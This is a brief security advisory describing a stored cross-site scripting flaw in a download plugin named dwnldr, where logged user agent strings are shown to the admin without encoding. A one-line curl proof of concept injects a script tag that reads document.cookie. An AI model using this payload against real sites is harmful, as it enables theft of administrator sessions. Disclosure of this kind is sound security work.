User agent strings are logged when requesting downloads that are processed by dwnldr and displayed back to the admin with no encoding, allowing for scripts to be stored and executed.
curl -A "User-Agent: <script>alert(document.cookie);</script>" -O http://<target>/?attachment_id=<attachment id>